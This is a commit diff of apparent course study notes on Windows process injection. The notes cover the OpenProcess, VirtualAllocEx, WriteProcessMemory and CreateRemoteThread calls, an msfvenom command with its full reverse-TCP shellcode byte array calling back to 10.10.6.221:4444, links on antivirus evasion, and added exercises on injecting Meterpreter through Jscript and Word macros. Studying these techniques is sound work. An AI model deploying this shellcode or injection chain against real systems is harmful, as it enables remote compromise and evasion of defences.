book/chapter5/readme.md, before:

http://www.pinvoke.net/

page - 131

# Process Injection

We are going to inject our shellcode to various processses to make it work.

## finding a home for shellcode 

We can run our shellcode either in an unlikely to terminate process like explorer.exe 
or start a hidden process notepad.exe
or we migrate to a process like svchost.exe

Process vs thread

A process has its own virtual memory space, and this space isnot meant to directly interact with other applications.

Thread executes the compiled assembly code of an application. Each thread has its own memory stack.


We will try to open one process from another using Win32 OpenProcess API.

We will modify its memory space using VirtualAllocEx, and WriteProcessMemory and start process with CreateRemoteThread.

### intptr

intptr are intermediate data types that can be used as a standby for point ot int. so used in handles.

### Openprocess API 

opens an existing process and needs 3 parameters. dwDesiredAccess establishes the access rights we require on that process. bInheritHandle - this determines if the handle can be inherited by a child process. dwProcessId - This is the process Id of the remote process.

Integrity level concept: We can access a process with lower integrity level from a higher intergrity level.

![](notepad_permissions.png)

VirtualAllocEx - this is used to allocate memory to our shellcode to a remote process

```c#
LPVOID VirtualAllocEx(
 HANDLE hProcess, // handle to process
 LPVOID lpAddress, // starting address of memory to wrtie our injected instructions
if the address mentioned is already in use then execution will fail so better to pass NULL
 SIZE_T dwSize, // size of allocation we will set as 0x1000
 DWORD flAllocationType,// MEM_COMMIT and MEM_RESERVE 0x3000
 DWORD flProtect // 0x40 PAGE_EXECUTE_READWRITE
)
```

### WriteProcessMemory

WriteProcessMemory - We can copy data to remote process. (RTLMoveMemory doesn't support this.)


```C#
[DllImport("kernel32.dll")]
static extern bool WriteProcessMemory(
     IntPtr hProcess,// process handle
     IntPtr lpBaseAddress,/// newly allocated memory address 
     byte[] lpBuffer,// address of bytearray containing the shell code
     Int32 nSize,// size of shellcode
     out IntPtr lpNumberOfBytesWritten // a pointers to memory localtion to output how much data was copied
);
```

Notice that the out252 keyword was prepended to the outSize variable to have it passed by 
reference instead of value. This ensures that the argument type aligns with the function 
prototype

to get shellcode use msfvenom given below

### CreateRemoteThread

CreateRemoteThread - as we cannot just call CreateThread.

```C#
HANDLE CreateRemoteThread(
 HANDLE hProcess, // process handle
 LPSECURITY_ATTRIBUTES lpThreadAttributes, // IntPtr.Zero for default values
 SIZE_T dwStackSize, // allowed stack size can be 0
 LPTHREAD_START_ROUTINE lpStartAddress, // start address of a thread
 LPVOID lpParameter, // pointer to variables that will be passed to the thread can be nill
 DWORD dwCreationFlags, // ignore 0
 LPDWORD lpThreadId // ignore IntPtr.Zero
)
```



### creating a code based injection


```C#
└─$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.6.221 LPORT=4444 -f csharp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of csharp file: 2362 bytes
byte[] buf = new byte[460] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,
0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,
0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0x0a,0x0a,0x06,0xdd,0x41,0x54,
0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,
0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,
0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,
0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,
0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,
0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,
0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,
0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,
0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,0xe6,
0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,
0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,
0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,0xba,0x08,0x87,0x1d,0x60,0xff,
0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5 };

```

Using mingw compiler https://www.msys2.org/


https://code.visualstudio.com/docs/cpp/config-mingw#:~:text=From%20the%20main%20menu%2C%20choose%20Run%20%3E%20Add%20Configuration..,build%20and%20debug%20active%20file. 

cttrl + shift + b - to build

with the pe injection it works from here - 

https://www.ired.team/offensive-security/code-injection-process-injection/process-injection

scan result 5/26

Trying to evade the AV we have - https://0xhop.github.io/evasion/2021/04/19/evasion-pt1/

Commit message:

need to do the 5.1 exercises

book/chapter5/readme.md, after:

http://www.pinvoke.net/

page - 131

# Process Injection andmigration

We are going to inject our shellcode to various processses to make it work.

# finding a home for shellcode 

We can run our shellcode either in an unlikely to terminate process like explorer.exe 
or start a hidden process notepad.exe
or we migrate to a process like svchost.exe

# process injection and migration theory

Process vs thread

A process has its own virtual memory space, and this space isnot meant to directly interact with other applications.

Thread executes the compiled assembly code of an application. Each thread has its own memory stack.


We will try to open one process from another using Win32 OpenProcess API.

We will modify its memory space using VirtualAllocEx, and WriteProcessMemory and start process with CreateRemoteThread.

### intptr

intptr are intermediate data types that can be used as a standby for point ot int. so used in handles.

### Openprocess API 

opens an existing process and needs 3 parameters. dwDesiredAccess establishes the access rights we require on that process. bInheritHandle - this determines if the handle can be inherited by a child process. dwProcessId - This is the process Id of the remote process.

Integrity level concept: We can access a process with lower integrity level from a higher intergrity level.

![](notepad_permissions.png)

VirtualAllocEx - this is used to allocate memory to our shellcode to a remote process

# process injection in C#

gives in detail how to look for functions in pinvoke.net.

```c#
LPVOID VirtualAllocEx(
 HANDLE hProcess, // handle to process
 LPVOID lpAddress, // starting address of memory to wrtie our injected instructions
if the address mentioned is already in use then execution will fail so better to pass NULL
 SIZE_T dwSize, // size of allocation we will set as 0x1000
 DWORD flAllocationType,// MEM_COMMIT and MEM_RESERVE 0x3000
 DWORD flProtect // 0x40 PAGE_EXECUTE_READWRITE
)
```

### WriteProcessMemory

WriteProcessMemory - We can copy data to remote process. (RTLMoveMemory doesn't support this.)


```C#
[DllImport("kernel32.dll")]
static extern bool WriteProcessMemory(
     IntPtr hProcess,// process handle
     IntPtr lpBaseAddress,/// newly allocated memory address 
     byte[] lpBuffer,// address of bytearray containing the shell code
     Int32 nSize,// size of shellcode
     out IntPtr lpNumberOfBytesWritten // a pointers to memory localtion to output how much data was copied
);
```

Notice that the out252 keyword was prepended to the outSize variable to have it passed by 
reference instead of value. This ensures that the argument type aligns with the function 
prototype

to get shellcode use msfvenom given below

### CreateRemoteThread

CreateRemoteThread - as we cannot just call CreateThread.

```C#
HANDLE CreateRemoteThread(
 HANDLE hProcess, // process handle
 LPSECURITY_ATTRIBUTES lpThreadAttributes, // IntPtr.Zero for default values
 SIZE_T dwStackSize, // allowed stack size can be 0
 LPTHREAD_START_ROUTINE lpStartAddress, // start address of a thread
 LPVOID lpParameter, // pointer to variables that will be passed to the thread can be nill
 DWORD dwCreationFlags, // ignore 0
 LPDWORD lpThreadId // ignore IntPtr.Zero
)
```



### creating a code based injection


```C#
└─$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.6.221 LPORT=4444 -f csharp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of csharp file: 2362 bytes
byte[] buf = new byte[460] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,
0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,
0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0x0a,0x0a,0x06,0xdd,0x41,0x54,
0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,
0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,
0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,
0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,
0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,
0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,
0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,
0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,
0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,0xe6,
0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,
0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,
0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,0xba,0x08,0x87,0x1d,0x60,0xff,
0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5 };

```

Using mingw compiler https://www.msys2.org/


https://code.visualstudio.com/docs/cpp/config-mingw#:~:text=From%20the%20main%20menu%2C%20choose%20Run%20%3E%20Add%20Configuration..,build%20and%20debug%20active%20file. 

cttrl + shift + b - to build

with the pe injection it works from here - 

https://www.ired.team/offensive-security/code-injection-process-injection/process-injection

scan result 5/26

Trying to evade the AV we have - https://0xhop.github.io/evasion/2021/04/19/evasion-pt1/

### 5.1.2.1 Exercises
1. Replicate the steps and inject a reverse Meterpreter shell into the explorer.exe process.

2. Modify the code of the ExampleAssembly project in DotNetToJscript to create a Jscript file 
that executes the shellcode inside explorer.exe. Instead of hardcoding the process ID, which 
cannot be known remotely, use the Process.GetProcessByName255 method to resolve it 
dynamically.

3. Port the code from C# to PowerShell to allow process injection and shellcode execution 
from a Word macro through PowerShell. Remember that PowerShell is started as 32-bit, so 
instead of injecting into explorer.exe, start a 32-bit process such as Notepad and inject into 
that instead.

### 5.1.2.2 Extra Mile

Process injection with VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread is 
considered a standard technique, but there are a few others to consider.
The low-level native APIs NtCreateSection, NtMapViewOfSection, NtUnMapViewOfSection, and 
NtClose in ntdll.dll can be used as alternatives to VirtualAllocEx and WriteProcessMemory.
Create C# code that performs process injection using the four new APIs instead of VirtualAllocEx
and WriteProcessMemory. Convert the code to Jscript with DotNetToJscript. Note that 
CreateRemoteThread must still be used to execute the shellcode
